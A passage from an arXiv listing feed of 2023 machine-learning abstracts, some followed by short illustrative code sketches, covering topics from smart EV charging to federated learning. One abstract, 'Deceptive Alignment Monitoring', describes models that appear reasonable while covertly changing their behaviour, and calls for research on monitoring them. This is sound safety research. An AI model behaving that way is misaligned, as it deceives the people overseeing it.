    The drastic growth of electric vehicles and photovoltaics can introduce new challenges, such as electrical current congestion and voltage limit violations due to peak load demands. These issues can be mitigated by controlling the operation of electric vehicles, i.e., smart charging. Centralized smart charging solutions have already been proposed in the literature, but such solutions may lack scalability and suffer from the inherent drawbacks of centralization, such as a single point of failure and data privacy concerns. Decentralization can help tackle these challenges. In this paper, a fully decentralized smart charging system is proposed using the philosophy of adaptive multi-agent systems. The proposed system utilizes multi-armed bandit learning to handle uncertainties in the system. The presented system is decentralized, scalable, real-time, model-free, and takes fairness among different players into account. A detailed case study is also presented for performance evaluation.
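    To illustrate the bandit component, a single charger choosing among a few charging rates can be modeled with the classic UCB1 rule: play each arm once, then balance the empirical mean reward against an exploration bonus. This is a standard single-agent sketch, not the paper's adaptive multi-agent algorithm; the reward function here is a hypothetical stand-in for cost/congestion feedback.

    ```python
    import math
    import random

    def ucb1(reward_fn, n_arms, horizon, seed=0):
        """UCB1 bandit: pick the arm maximizing mean reward plus an
        exploration bonus; returns how often each arm was played."""
        random.seed(seed)
        counts = [0] * n_arms
        values = [0.0] * n_arms
        for t in range(1, horizon + 1):
            if t <= n_arms:   # initialization: play each arm once
                arm = t - 1
            else:             # exploit + logarithmic exploration bonus
                arm = max(range(n_arms),
                          key=lambda a: values[a]
                          + math.sqrt(2 * math.log(t) / counts[a]))
            r = reward_fn(arm)
            counts[arm] += 1
            values[arm] += (r - values[arm]) / counts[arm]  # running mean
        return counts

    # Hypothetical charging rates; arm 1 yields the highest mean reward.
    means = [0.2, 0.8, 0.5]
    counts = ucb1(lambda a: means[a] + random.uniform(-0.1, 0.1), 3, 2000)
    print(counts)  # arm 1 is pulled far more often than the others
    ```

    In the decentralized setting each EV runs such a learner independently, with the shared grid state entering through the observed rewards rather than through a central coordinator.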
    Assessing the Use of AutoML for Data-Driven Software Engineering. (arXiv:2307.10774v1 [cs.SE])
    Background. Due to the widespread adoption of Artificial Intelligence (AI) and Machine Learning (ML) for building software applications, companies are struggling to recruit employees with a deep understanding of such technologies. In this scenario, AutoML is soaring as a promising solution to fill the AI/ML skills gap since it promises to automate the building of end-to-end AI/ML pipelines that would normally be engineered by specialized team members. Aims. Despite the growing interest and high expectations, there is a dearth of information about the extent to which AutoML is currently adopted by teams developing AI/ML-enabled systems and how it is perceived by practitioners and researchers. Method. To fill these gaps, in this paper, we present a mixed-method study comprising a benchmark of 12 end-to-end AutoML tools on two SE datasets and a user survey with follow-up interviews to further our understanding of AutoML adoption and perception. Results. We found that AutoML solutions can generate models that outperform those trained and optimized by researchers to perform classification tasks in the SE domain. Also, our findings show that the currently available AutoML solutions do not live up to their names as they do not equally support automation across the stages of the ML development workflow and for all the team members. Conclusions. We derive insights to inform the SE research community on how AutoML can facilitate their activities and tool builders on how to design the next generation of AutoML technologies.
    Self2Self+: Single-Image Denoising with Self-Supervised Learning and Image Quality Assessment Loss. (arXiv:2307.10695v1 [cs.CV])
    Recently, denoising methods based on supervised learning have exhibited promising performance. However, their reliance on external datasets containing noisy-clean image pairs restricts their applicability. To address this limitation, researchers have focused on training denoising networks using solely a set of noisy inputs. To improve the feasibility of denoising procedures, in this study, we proposed a single-image self-supervised learning method in which only the noisy input image is used for network training. Gated convolution was used for feature extraction and no-reference image quality assessment was used for guiding the training process. Moreover, the proposed method sampled instances from the input image dataset using Bernoulli sampling with a certain dropout rate for training. The corresponding result was produced by averaging the generated predictions from various instances of the trained network with dropouts. The experimental results indicated that the proposed method achieved state-of-the-art denoising performance on both synthetic and real-world datasets. This highlights the effectiveness and practicality of our method as a potential solution for various noise removal tasks.
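    The Bernoulli-sampling-and-averaging step can be sketched as follows: repeatedly mask the noisy input with Bernoulli dropout, run the network on each masked instance, and average the predictions. This is a toy 1-D sketch of the averaging procedure; `predict` is a hypothetical stand-in for the trained gated-convolution network.

    ```python
    import random

    def denoise(noisy, predict, n_samples=50, p_drop=0.3, seed=0):
        """Average predictions over Bernoulli-masked instances of the input.

        noisy:   list of pixel values (a 1-D stand-in for an image).
        predict: callable mapping a masked input to a prediction of the
                 same length (stands in for the trained network).
        """
        random.seed(seed)
        acc = [0.0] * len(noisy)
        for _ in range(n_samples):
            # Bernoulli sampling: each pixel is dropped with probability p_drop.
            masked = [0.0 if random.random() < p_drop else x for x in noisy]
            pred = predict(masked)
            acc = [a + p for a, p in zip(acc, pred)]
        return [a / n_samples for a in acc]

    # With an identity "network" on a constant signal, every output entry is
    # an average of Bernoulli-masked values and therefore lies in [0, 1].
    out = denoise([1.0] * 10, lambda v: v)
    print(all(0.0 <= o <= 1.0 for o in out))  # → True
    ```

    Averaging over many dropout masks reduces the variance of any single masked prediction, which is what makes the ensemble output a usable denoised estimate.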
    FigCaps-HF: A Figure-to-Caption Generative Framework and Benchmark with Human Feedback. (arXiv:2307.10867v1 [cs.CL])
    Captions are crucial for understanding scientific visualizations and documents. Existing captioning methods for scientific figures rely on figure-caption pairs extracted from documents for training, many of which fall short with respect to metrics like helpfulness, explainability, and visual-descriptiveness [15], leading to generated captions being misaligned with reader preferences. To enable the generation of high-quality figure captions, we introduce FigCaps-HF, a new framework for figure-caption generation that can incorporate domain expert feedback in generating captions optimized for reader preferences. Our framework comprises 1) an automatic method for evaluating the quality of figure-caption pairs, and 2) a novel reinforcement learning with human feedback (RLHF) method to optimize a generative figure-to-caption model for reader preferences. We demonstrate the effectiveness of our simple learning framework by improving performance over standard fine-tuning across different types of models. In particular, when using BLIP as the base model, our RLHF framework achieves a mean gain of 35.7%, 16.9%, and 9% in ROUGE, BLEU, and Meteor, respectively. Finally, we release a large-scale benchmark dataset with human feedback on figure-caption pairs to enable further evaluation and development of RLHF techniques for this problem.  ( 2 min )
    Deceptive Alignment Monitoring. (arXiv:2307.10569v1 [cs.LG])
    As the capabilities of large machine learning models continue to grow, and as the autonomy afforded to such models continues to expand, the spectre of a new adversary looms: the models themselves. The threat that a model might behave in a seemingly reasonable manner, while secretly and subtly modifying its behavior for ulterior reasons is often referred to as deceptive alignment in the AI Safety & Alignment communities. Consequently, we call this new direction Deceptive Alignment Monitoring. In this work, we identify emerging directions in diverse machine learning subfields that we believe will become increasingly important and intertwined in the near future for deceptive alignment monitoring, and we argue that advances in these fields present both long-term challenges and new research opportunities. We conclude by advocating for greater involvement by the adversarial machine learning community in these emerging directions.  ( 2 min )
    SciBench: Evaluating College-Level Scientific Problem-Solving Abilities of Large Language Models. (arXiv:2307.10635v1 [cs.CL])
    Recent advances in large language models (LLMs) have demonstrated notable progress on many mathematical benchmarks. However, most of these benchmarks only feature problems grounded in junior and senior high school subjects, contain only multiple-choice questions, and are confined to a limited scope of elementary arithmetic operations. To address these issues, this paper introduces an expansive benchmark suite SciBench that aims to systematically examine the reasoning capabilities required for complex scientific problem solving. SciBench contains two carefully curated datasets: an open set featuring a range of collegiate-level scientific problems drawn from mathematics, chemistry, and physics textbooks, and a closed set comprising problems from undergraduate-level exams in computer science and mathematics. Based on the two datasets, we conduct an in-depth benchmark study of two representative LLMs with various prompting strategies. The results reveal that current LLMs fall short of delivering satisfactory performance, with an overall score of merely 35.80%. Furthermore, through a detailed user study, we categorize the errors made by LLMs into ten problem-solving abilities. Our analysis indicates that no single prompting strategy significantly outperforms others and some strategies that demonstrate improvements in certain problem-solving skills result in declines in other skills. We envision that SciBench will catalyze further developments in the reasoning abilities of LLMs, thereby ultimately contributing to scientific research and discovery.  ( 3 min )
    Nonlinear Meta-Learning Can Guarantee Faster Rates. (arXiv:2307.10870v1 [stat.ML])
    Many recent theoretical works on \emph{meta-learning} aim to achieve guarantees in leveraging similar representational structures from related tasks towards simplifying a target task. Importantly, the main aim in theory works on the subject is to understand the extent to which convergence rates -- in learning a common representation -- \emph{may scale with the number $N$ of tasks} (as well as the number of samples per task). First steps in this setting demonstrate this property when both the shared representation amongst tasks, and task-specific regression functions, are linear. This linear setting readily reveals the benefits of aggregating tasks, e.g., via averaging arguments. In practice, however, the representation is often highly nonlinear, introducing nontrivial biases in each task that cannot easily be averaged out as in the linear case. In the present work, we derive theoretical guarantees for meta-learning with nonlinear representations. In particular, assuming the shared nonlinearity maps to an infinite-dimensional RKHS, we show that additional biases can be mitigated with careful regularization that leverages the smoothness of task-specific regression functions.  ( 2 min )
    Mitigating Voter Attribute Bias for Fair Opinion Aggregation. (arXiv:2307.10749v1 [cs.HC])
    The aggregation of multiple opinions plays a crucial role in decision-making, such as in hiring and loan review, and in labeling data for supervised learning. Although majority voting and existing opinion aggregation models are effective for simple tasks, they are inappropriate for tasks without objectively true labels in which disagreements may occur. In particular, when voter attributes such as gender or race introduce bias into opinions, the aggregation results may vary depending on the composition of voter attributes. A balanced group of voters is desirable for fair aggregation results but may be difficult to prepare. In this study, we consider methods to achieve fair opinion aggregation based on voter attributes and evaluate the fairness of the aggregated results. To this end, we consider an approach that combines opinion aggregation models such as majority voting and the Dawid and Skene model (D&S model) with fairness options such as sample weighting. To evaluate the fairness of opinion aggregation, probabilistic soft labels are preferred over discrete class labels. First, we address the problem of soft label estimation without considering voter attributes and identify some issues with the D&S model. To address these limitations, we propose a new Soft D&S model with improved accuracy in estimating soft labels. Moreover, we evaluate the fairness of an opinion aggregation model, including Soft D&S, in combination with different fairness options using synthetic and semi-synthetic data. The experimental results suggest that the combination of Soft D&S and data splitting as a fairness option is effective for dense data, whereas weighted majority voting is effective for sparse data. These findings should prove particularly valuable in supporting decision-making by human and machine-learning models with balanced opinion aggregation.  ( 3 min )
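As an illustration of one fairness option mentioned in the abstract, a sample-weighted majority vote that balances voter attribute groups and outputs probabilistic soft labels might look as follows (a sketch under our own naming; the paper's Soft D&S model is more involved):

```python
import numpy as np

def weighted_soft_majority(votes, voter_attrs, n_classes=2):
    """Weighted majority voting as a fairness option: reweight each vote so
    that every attribute group (e.g. a demographic) contributes equal total
    weight, then aggregate into a probabilistic soft label per item.

    votes: (n_items, n_voters) integer labels
    voter_attrs: (n_voters,) group id per voter
    """
    groups, counts = np.unique(voter_attrs, return_counts=True)
    # equal total weight per group regardless of its size
    w = np.zeros(len(voter_attrs))
    for g, c in zip(groups, counts):
        w[voter_attrs == g] = 1.0 / (len(groups) * c)
    soft = np.zeros((votes.shape[0], n_classes))
    for k in range(n_classes):
        soft[:, k] = ((votes == k) * w).sum(axis=1)
    return soft / soft.sum(axis=1, keepdims=True)

votes = np.array([[1, 1, 0, 0, 0]])   # one item, five voters
attrs = np.array([0, 0, 0, 1, 1])     # group 0 outnumbers group 1
print(weighted_soft_majority(votes, attrs))
```

With these toy inputs the majority group's three votes carry the same total weight as the minority group's two, yielding a group-balanced soft label instead of a raw vote count.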
    Fractional Denoising for 3D Molecular Pre-training. (arXiv:2307.10683v1 [q-bio.QM])
    Coordinate denoising is a promising 3D molecular pre-training method, which has achieved remarkable performance in various downstream drug discovery tasks. Theoretically, the objective is equivalent to learning the force field, which is revealed to be helpful for downstream tasks. Nevertheless, there are two challenges for coordinate denoising to learn an effective force field, i.e. low coverage samples and isotropic force field. The underlying reason is that molecular distributions assumed by existing denoising methods fail to capture the anisotropic characteristic of molecules. To tackle these challenges, we propose a novel hybrid noise strategy, including noise on both dihedral angles and coordinates. However, denoising such hybrid noise in a traditional way is no longer equivalent to learning the force field. Through theoretical deductions, we find that the problem is caused by the dependency of the covariance on the input conformation. To this end, we propose to decouple the two types of noise and design a novel fractional denoising method (Frad), which only denoises the latter coordinate part. In this way, Frad enjoys both the merits of sampling more low-energy structures and the force field equivalence. Extensive experiments show the effectiveness of Frad in molecular representation, with a new state-of-the-art on 9 out of 12 tasks of QM9 and on 7 out of 8 targets of MD17.  ( 2 min )
    Refining the Optimization Target for Automatic Univariate Time Series Anomaly Detection in Monitoring Services. (arXiv:2307.10653v1 [cs.LG])
    Time series anomaly detection is crucial for industrial monitoring services that handle a large volume of data, aiming to ensure reliability and optimize system performance. Existing methods often require extensive labeled resources and manual parameter selection, highlighting the need for automation. This paper proposes a comprehensive framework for automatic parameter optimization in time series anomaly detection models. The framework introduces three optimization targets: prediction score, shape score, and sensitivity score, which can be easily adapted to different model backbones without prior knowledge or manual labeling efforts. The proposed framework has been successfully applied online for over six months, serving more than 50,000 time series every minute. It simplifies the user's experience by requiring only an expected sensitive value, offering a user-friendly interface, and achieving desired detection results. Extensive evaluations conducted on public datasets and comparison with other methods further confirm the effectiveness of the proposed framework.  ( 2 min )
    Differences Between Hard and Noisy-labeled Samples: An Empirical Study. (arXiv:2307.10718v1 [cs.LG])
    Extracting noisy or incorrectly labeled samples from a labeled dataset with hard/difficult samples is an important yet under-explored topic. Two general and often independent lines of work exist, one focuses on addressing noisy labels, and another deals with hard samples. However, when both types of data are present, most existing methods treat them equally, which results in a decline in the overall performance of the model. In this paper, we first design various synthetic datasets with custom hardness and noisiness levels for different samples. Our proposed systematic empirical study enables us to better understand the similarities and more importantly the differences between hard-to-learn samples and incorrectly-labeled samples. These controlled experiments pave the way for the development of methods that distinguish between hard and noisy samples. Through our study, we introduce a simple yet effective metric that filters out noisy-labeled samples while keeping the hard samples. We study various data partitioning methods in the presence of label noise and observe that filtering out noisy samples from hard samples with this proposed metric results in the best datasets as evidenced by the high test accuracy achieved after models are trained on the filtered datasets. We demonstrate this for both our created synthetic datasets and for datasets with real-world label noise. Furthermore, our proposed data partitioning method significantly outperforms other methods when employed within a semi-supervised learning framework.  ( 2 min )
    Label Calibration for Semantic Segmentation Under Domain Shift. (arXiv:2307.10842v1 [cs.CV])
    Performance of a pre-trained semantic segmentation model is likely to substantially decrease on data from a new domain. We show a pre-trained model can be adapted to unlabelled target domain data by calculating soft-label prototypes under the domain shift and making predictions according to the prototype closest to the vector with predicted class probabilities. The proposed adaptation procedure is fast, comes almost for free in terms of computational resources and leads to considerable performance improvements. We demonstrate the benefits of such label calibration on the highly-practical synthetic-to-real semantic segmentation problem.  ( 2 min )
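The prototype-based calibration step can be sketched roughly as follows. This is our own simplified reading of the abstract (function and variable names are hypothetical), operating on predicted class-probability vectors rather than the authors' exact pipeline:

```python
import numpy as np

def adapt_by_prototypes(probs, n_classes):
    """Label-calibration sketch: build one soft-label prototype per class by
    averaging the predicted probability vectors pseudo-assigned to it, then
    re-predict each sample by its nearest prototype in probability space.

    probs: (n_samples, n_classes) softmax outputs on unlabelled target data
    """
    pseudo = probs.argmax(axis=1)
    protos = np.stack([
        probs[pseudo == k].mean(axis=0) if (pseudo == k).any()
        else np.full(n_classes, 1.0 / n_classes)   # fallback for empty class
        for k in range(n_classes)
    ])
    # assign each sample to the closest prototype
    d = ((probs[:, None, :] - protos[None, :, :]) ** 2).sum(axis=2)
    return d.argmin(axis=1), protos
```

For semantic segmentation, `probs` would be the per-pixel softmax outputs flattened over the image; the only cost beyond a forward pass is the prototype averaging, which matches the abstract's claim that adaptation comes almost for free.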
    Graphs in State-Space Models for Granger Causality in Climate Science. (arXiv:2307.10703v1 [cs.LG])
    Granger causality (GC) is often considered not an actual form of causality. Still, it is arguably the most widely used method to assess the predictability of a time series from another one. Granger causality has been widely used in many applied disciplines, from neuroscience and econometrics to Earth sciences. We revisit GC under a graphical perspective of state-space models. For that, we use GraphEM, a recently presented expectation-maximisation algorithm for estimating the linear matrix operator in the state equation of a linear-Gaussian state-space model. Lasso regularisation is included in the M-step, which is solved using a proximal splitting Douglas-Rachford algorithm. Experiments in toy examples and challenging climate problems illustrate the benefits of the proposed model and inference technique over standard Granger causality methods.  ( 2 min )
    Air Traffic Controller Workload Level Prediction using Conformalized Dynamical Graph Learning. (arXiv:2307.10559v1 [cs.LG])
    Air traffic control (ATC) is a safety-critical service system that demands constant attention from ground air traffic controllers (ATCos) to maintain daily aviation operations. The workload of the ATCos can have negative effects on operational safety and airspace usage. To avoid overloading and ensure an acceptable workload level for the ATCos, it is important to predict the ATCos' workload accurately for mitigation actions. In this paper, we first perform a review of research on ATCo workload, mostly from the air traffic perspective. Then, we briefly introduce the setup of the human-in-the-loop (HITL) simulations with retired ATCos, where the air traffic data and workload labels are obtained. The simulations are conducted under three Phoenix approach scenarios while the human ATCos are requested to self-evaluate their workload ratings (i.e., low-1 to high-7). Preliminary data analysis is conducted. Next, we propose a graph-based deep-learning framework with conformal prediction to identify the ATCo workload levels. The number of aircraft under the controller's control varies both spatially and temporally, resulting in dynamically evolving graphs. The experiment results suggest that (a) besides the traffic density feature, the traffic conflict feature (i.e., minimum horizontal/vertical separation distance) contributes to the workload prediction capabilities; (b) directly learning from the spatiotemporal graph layout of airspace with a graph neural network can achieve higher prediction accuracy, compared to hand-crafted traffic complexity features; (c) conformal prediction is a valuable tool to further boost model prediction accuracy, resulting in a range of predicted workload labels. The code used is available at \href{https://github.com/ymlasu/para-atm-collection/blob/master/air-traffic-prediction/ATC-Workload-Prediction/}{$\mathsf{Link}$}.  ( 3 min )
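The conformal-prediction component can be illustrated with a generic split-conformal sketch (our own simplification, not the paper's code): calibrate a score threshold on held-out data, then report the set of workload labels whose scores fall below it.

```python
import numpy as np

def conformal_label_set(cal_probs, cal_labels, test_probs, alpha=0.1):
    """Split conformal prediction sketch: turn point predictions of workload
    level into a set of plausible labels with ~(1 - alpha) coverage.

    cal_probs:  (n_cal, n_classes) softmax outputs on calibration data
    cal_labels: (n_cal,) true workload labels for calibration
    test_probs: (n_test, n_classes) softmax outputs on test data
    """
    n = len(cal_labels)
    # nonconformity score: 1 - probability assigned to the true label
    scores = 1.0 - cal_probs[np.arange(n), cal_labels]
    q = np.quantile(scores, np.ceil((n + 1) * (1 - alpha)) / n,
                    method="higher")
    return [np.where(1.0 - p <= q)[0] for p in test_probs]
```

The returned label sets widen when the model is uncertain, matching the abstract's "range of predicted workload labels". (`method="higher"` requires NumPy 1.22+.)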
    Impatient Bandits: Optimizing Recommendations for the Long-Term Without Delay. (arXiv:2307.09943v2 [cs.LG] UPDATED)
    Recommender systems are a ubiquitous feature of online platforms. Increasingly, they are explicitly tasked with increasing users' long-term satisfaction. In this context, we study a content exploration task, which we formalize as a multi-armed bandit problem with delayed rewards. We observe that there is an apparent trade-off in choosing the learning signal: Waiting for the full reward to become available might take several weeks, hurting the rate at which learning happens, whereas measuring short-term proxy rewards reflects the actual long-term goal only imperfectly. We address this challenge in two steps. First, we develop a predictive model of delayed rewards that incorporates all information obtained to date. Full observations as well as partial (short or medium-term) outcomes are combined through a Bayesian filter to obtain a probabilistic belief. Second, we devise a bandit algorithm that takes advantage of this new predictive model. The algorithm quickly learns to identify content aligned with long-term success by carefully balancing exploration and exploitation. We apply our approach to a podcast recommendation problem, where we seek to identify shows that users engage with repeatedly over two months. We empirically validate that our approach results in substantially better performance compared to approaches that either optimize for short-term proxies, or wait for the long-term outcome to be fully realized.  ( 3 min )
    Reparameterized Policy Learning for Multimodal Trajectory Optimization. (arXiv:2307.10710v1 [cs.LG])
    We investigate the challenge of parametrizing policies for reinforcement learning (RL) in high-dimensional continuous action spaces. Our objective is to develop a multimodal policy that overcomes limitations inherent in the commonly-used Gaussian parameterization. To achieve this, we propose a principled framework that models the continuous RL policy as a generative model of optimal trajectories. By conditioning the policy on a latent variable, we derive a novel variational bound as the optimization objective, which promotes exploration of the environment. We then present a practical model-based RL method, called Reparameterized Policy Gradient (RPG), which leverages the multimodal policy parameterization and learned world model to achieve strong exploration capabilities and high data efficiency. Empirical results demonstrate that our method can help agents evade local optima in tasks with dense rewards and solve challenging sparse-reward environments by incorporating an object-centric intrinsic reward. Our method consistently outperforms previous approaches across a range of tasks. Code and supplementary materials are available on the project page https://haosulab.github.io/RPG/  ( 2 min )
    Risk-optimized Outlier Removal for Robust Point Cloud Classification. (arXiv:2307.10875v1 [cs.CV])
    The popularity of point cloud deep models for safety-critical purposes has increased, but the reliability and security of these models can be compromised by intentional or naturally occurring point cloud noise. To combat this issue, we present a novel point cloud outlier removal method called PointCVaR, which empowers standard-trained models to eliminate additional outliers and restore the data. Our approach begins by conducting attribution analysis to determine the influence of each point on the model output, which we refer to as point risk. We then optimize the process of filtering high-risk points using Conditional Value at Risk (CVaR) as the objective. The rationale for this approach is based on the observation that noise points in point clouds tend to cluster in the tail of the risk distribution, with a low frequency but a high level of risk, resulting in significant interference with classification results. Despite requiring no additional training effort, our method produces exceptional results in various removal-and-classification experiments for noisy point clouds, which are corrupted by random noise, adversarial noise, and backdoor trigger noise. Impressively, it achieves 87% accuracy in defense against the backdoor attack by removing triggers. Overall, the proposed PointCVaR effectively eliminates noise points and enhances point cloud classification, making it a promising plug-in module for various models in different scenarios.  ( 2 min )
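A simplified version of the risk-tail filtering idea can be written as follows, with the CVaR optimization replaced by a plain quantile cutoff (our assumption, for illustration only):

```python
import numpy as np

def filter_high_risk_points(points, risk, drop_frac=0.1):
    """Outlier-removal sketch in the spirit of PointCVaR: given per-point
    risk scores (e.g. from attribution analysis of the classifier), drop the
    points in the upper tail of the risk distribution before re-classifying
    the cloud. The CVaR objective itself is replaced here by a simple
    quantile threshold.

    points: (n, 3) point cloud, risk: (n,) risk score per point
    """
    thresh = np.quantile(risk, 1.0 - drop_frac)
    keep = risk <= thresh
    return points[keep], keep
```

This captures the observation driving the method, that noise points cluster in the low-frequency, high-risk tail, so removing that tail restores the cloud for a standard-trained classifier.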
    FedSoup: Improving Generalization and Personalization in Federated Learning via Selective Model Interpolation. (arXiv:2307.10507v1 [cs.LG])
    Cross-silo federated learning (FL) enables the development of machine learning models on datasets distributed across data centers such as hospitals and clinical research laboratories. However, recent research has found that current FL algorithms face a trade-off between local and global performance when confronted with distribution shifts. Specifically, personalized FL methods have a tendency to overfit to local data, leading to a sharp valley in the local model and inhibiting its ability to generalize to out-of-distribution data. In this paper, we propose a novel federated model soup method (i.e., selective interpolation of model parameters) to optimize the trade-off between local and global performance. Specifically, during the federated training phase, each client maintains its own global model pool by monitoring the performance of the interpolated model between the local and global models. This allows us to alleviate overfitting and seek flat minima, which can significantly improve the model's generalization performance. We evaluate our method on retinal and pathological image classification tasks, and our proposed method achieves significant improvements for out-of-distribution generalization. Our code is available at https://github.com/ubc-tea/FedSoup.  ( 2 min )
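The core "soup" operation, parameter-wise interpolation between local and global weights with validation-based selection, can be sketched as follows (names and the candidate-coefficient grid are our own; the paper's monitoring procedure is richer):

```python
def interpolate_models(local, global_, alpha=0.5):
    """Selective model interpolation: parameter-wise convex combination of
    the local and global model weights (both given as name -> tensor dicts)."""
    return {k: alpha * local[k] + (1.0 - alpha) * global_[k] for k in local}

def select_alpha(local, global_, val_score,
                 alphas=(0.0, 0.25, 0.5, 0.75, 1.0)):
    """Keep the interpolation coefficient whose soup model validates best.
    val_score is a stand-in for the client's local evaluation routine."""
    return max(alphas,
               key=lambda a: val_score(interpolate_models(local, global_, a)))
```

A client sitting at a sharp local minimum would tend to select an intermediate `alpha`, pulling its model toward the flatter global solution without discarding personalization entirely.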
    FACADE: A Framework for Adversarial Circuit Anomaly Detection and Evaluation. (arXiv:2307.10563v1 [cs.LG])
    We present FACADE, a novel probabilistic and geometric framework designed for unsupervised mechanistic anomaly detection in deep neural networks. Its primary goal is advancing the understanding and mitigation of adversarial attacks. FACADE aims to generate probabilistic distributions over circuits, which provide critical insights into their contribution to changes in the manifold properties of pseudo-classes, or high-dimensional modes in activation space, yielding a powerful tool for uncovering and combating adversarial attacks. Our approach seeks to improve model robustness, enhance scalable model oversight, and demonstrate promising applications in real-world deployment settings.  ( 2 min )
    Interpreting and Correcting Medical Image Classification with PIP-Net. (arXiv:2307.10404v1 [cs.CV])
    Part-prototype models are explainable-by-design image classifiers, and a promising alternative to black box AI. This paper explores the applicability and potential of interpretable machine learning, in particular PIP-Net, for automated diagnosis support on real-world medical imaging data. PIP-Net learns human-understandable prototypical image parts and we evaluate its accuracy and interpretability for fracture detection and skin cancer diagnosis. We find that PIP-Net's decision making process is in line with medical classification standards, while only provided with image-level class labels. Because of PIP-Net's unsupervised pretraining of prototypes, data quality problems such as undesired text in an X-ray or labelling errors can be easily identified. Additionally, we are the first to show that humans can manually correct the reasoning of PIP-Net by directly disabling undesired prototypes. We conclude that part-prototype models are promising for medical applications due to their interpretability and potential for advanced model debugging.  ( 2 min )
    A Holistic Assessment of the Reliability of Machine Learning Systems. (arXiv:2307.10586v1 [cs.LG])
    As machine learning (ML) systems increasingly permeate high-stakes settings such as healthcare, transportation, military, and national security, concerns regarding their reliability have emerged. Despite notable progress, the performance of these systems can significantly diminish due to adversarial attacks or environmental changes, leading to overconfident predictions, failures to detect input faults, and an inability to generalize in unexpected scenarios. This paper proposes a holistic assessment methodology for the reliability of ML systems. Our framework evaluates five key properties: in-distribution accuracy, distribution-shift robustness, adversarial robustness, calibration, and out-of-distribution detection. A reliability score is also introduced and used to assess the overall system reliability. To provide insights into the performance of different algorithmic approaches, we identify and categorize state-of-the-art techniques, then evaluate a selection on real-world tasks using our proposed reliability metrics and reliability score. Our analysis of over 500 models reveals that designing for one metric does not necessarily constrain others but certain algorithmic techniques can improve reliability across multiple metrics simultaneously. This study contributes to a more comprehensive understanding of ML reliability and provides a roadmap for future research and development.  ( 2 min )
    Addressing caveats of neural persistence with deep graph persistence. (arXiv:2307.10865v1 [cs.LG])
    Neural Persistence is a prominent measure for quantifying neural network complexity, proposed in the emerging field of topological data analysis in deep learning. In this work, however, we find both theoretically and empirically that the variance of network weights and spatial concentration of large weights are the main factors that impact neural persistence. Whilst this captures useful information for linear classifiers, we find that no relevant spatial structure is present in later layers of deep neural networks, making neural persistence roughly equivalent to the variance of weights. Additionally, the proposed averaging procedure across layers for deep neural networks does not consider interaction between layers. Based on our analysis, we propose an extension of the filtration underlying neural persistence to the whole neural network instead of single layers, which is equivalent to calculating neural persistence on one particular matrix. This yields our deep graph persistence measure, which implicitly incorporates persistent paths through the network and alleviates variance-related issues through standardisation. Code is available at https://github.com/ExplainableML/Deep-Graph-Persistence .
    Generative Language Models on Nucleotide Sequences of Human Genes. (arXiv:2307.10634v1 [q-bio.GN])
    Language models, primarily transformer-based ones, have obtained colossal success in NLP; studies like BERT in NLU and works such as GPT-3 in NLG are crucial examples. DNA sequences are very close to natural language in terms of structure, and for the DNA-related bioinformatics domain, discriminative models like DNABert already exist. Yet the generative side of the coin remains mainly unexplored to the best of our knowledge. Consequently, we focus on developing an autoregressive generative language model, in the spirit of GPT-3, for DNA sequences. Because working with whole DNA sequences is challenging without substantial computational resources, we carry out our study on a smaller scale, focusing on nucleotide sequences of human genes, i.e. unique parts of DNA with specific functionalities, instead of the whole DNA. This decision does not change the problem structure much, since both DNA and genes can be seen as 1D sequences consisting of four different nucleotides, without losing much information or oversimplifying. We first systematically examine this almost entirely unexplored problem and observe that RNNs perform best, while simple techniques like N-grams are also promising. Other lessons include how to work with generative models on languages we do not understand, unlike natural language, and how essential it is to evaluate on real-life tasks beyond classical metrics such as perplexity. Furthermore, we examine whether the data-hungry nature of these models can be changed by selecting a language with a minimal vocabulary size, namely four, owing to the four types of nucleotides, as such a language might make the problem easier. However, we observe that this does not provide much of a change in the amount of data needed.
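As a concrete reference point for the N-gram baseline mentioned above, a character-level N-gram model on the four-letter nucleotide alphabet can be implemented in a few lines (our own illustrative sketch, not the paper's code):

```python
from collections import Counter, defaultdict
import random

def train_ngram(seqs, n=3):
    """Character-level N-gram baseline on nucleotide sequences:
    count (n-1)-length context -> next-nucleotide transitions."""
    counts = defaultdict(Counter)
    for s in seqs:
        for i in range(len(s) - n + 1):
            counts[s[i:i + n - 1]][s[i + n - 1]] += 1
    return counts

def generate(counts, seed, length=20, rng=random.Random(0)):
    """Autoregressively sample nucleotides from the fitted N-gram counts;
    seed must have length n-1."""
    out = seed
    k = len(seed)
    while len(out) < length:
        ctx = counts.get(out[-k:])
        if not ctx:
            break  # unseen context: stop generating
        nts, ws = zip(*ctx.items())
        out += rng.choices(nts, weights=ws)[0]
    return out

counts = train_ngram(["ACGTACGTACGT"], n=3)
print(generate(counts, "AC", length=20))  # → ACGTACGTACGTACGTACGT
```

The four-symbol vocabulary makes the model tiny, which is exactly the property the abstract probes when asking whether a minimal vocabulary reduces data requirements.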
    Boosting Federated Learning Convergence with Prototype Regularization. (arXiv:2307.10575v1 [cs.LG])
    As a distributed machine learning technique, federated learning (FL) requires clients to collaboratively train a shared model with an edge server without leaking their local data. However, the heterogeneous data distribution among clients often leads to a decrease in model performance. To tackle this issue, this paper introduces a prototype-based regularization strategy to address the heterogeneity in the data distribution. Specifically, the regularization process involves the server aggregating local prototypes from distributed clients to generate a global prototype, which is then sent back to the individual clients to guide their local training. The experimental results on MNIST and Fashion-MNIST show that our proposal achieves improvements of 3.3% and 8.9% in average test accuracy, respectively, compared to the most popular baseline FedAvg. Furthermore, our approach has a fast convergence rate in heterogeneous settings.
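The prototype aggregation and regularization loop can be sketched as follows; the size-weighted average and squared-distance regularizer are our own illustrative choices, not necessarily the paper's exact formulation:

```python
import numpy as np

def aggregate_prototypes(client_protos, client_sizes):
    """Server-side step: combine per-class local prototypes (mean feature
    vectors per class) into a global prototype, weighted by client data size.

    client_protos: list of (n_classes, dim) arrays, one per client
    client_sizes:  number of samples at each client
    """
    w = np.asarray(client_sizes, dtype=float)
    w /= w.sum()
    stacked = np.stack(client_protos)          # (n_clients, n_classes, dim)
    return (w[:, None, None] * stacked).sum(axis=0)

def prototype_regularizer(features, labels, global_proto):
    """Client-side term added to the local loss: mean squared distance
    between each sample's feature vector and the global prototype of its
    class, pulling heterogeneous clients toward a shared representation."""
    return ((features - global_proto[labels]) ** 2).sum(axis=1).mean()
```

Each round, clients send their local prototypes up, the server broadcasts the aggregate back, and local training minimizes the task loss plus this regularizer.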
    Properties of Discrete Sliced Wasserstein Losses. (arXiv:2307.10352v1 [stat.ML])
